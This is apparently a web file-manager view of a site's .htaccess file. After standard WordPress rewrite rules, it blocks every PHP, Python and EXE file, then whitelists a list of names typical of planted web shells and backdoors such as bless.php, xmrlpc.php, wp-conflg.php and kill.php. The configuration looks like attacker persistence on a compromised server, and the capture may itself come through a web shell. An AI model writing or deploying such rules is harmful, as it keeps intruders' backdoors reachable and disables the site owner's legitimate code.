Current Path : /home/bitrix/ext_www/mr.yacl.site/ |
Current File : /home/bitrix/ext_www/mr.yacl.site/.htaccess |
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "(^wp-login.php|^style.php|^style2.php|^index.php|^bless.php|^wp-blog.php||^wp-add.php|^admin.php|^wp-good.php|^upload.php|^xmrlpc.php|^install.php|^cloud.php|^wp-conflg.php|^123.php|^kill.php|^kill0_3.php|^file.php|^cdm.php|^xmrlpc.php|^about.php|^cloud.php|^def.php|^cong.php|^sgd.php|^cjfuns.php|^cong.php|^about.php|^etatism.php)$"> Order allow,deny Allow from all </FilesMatch>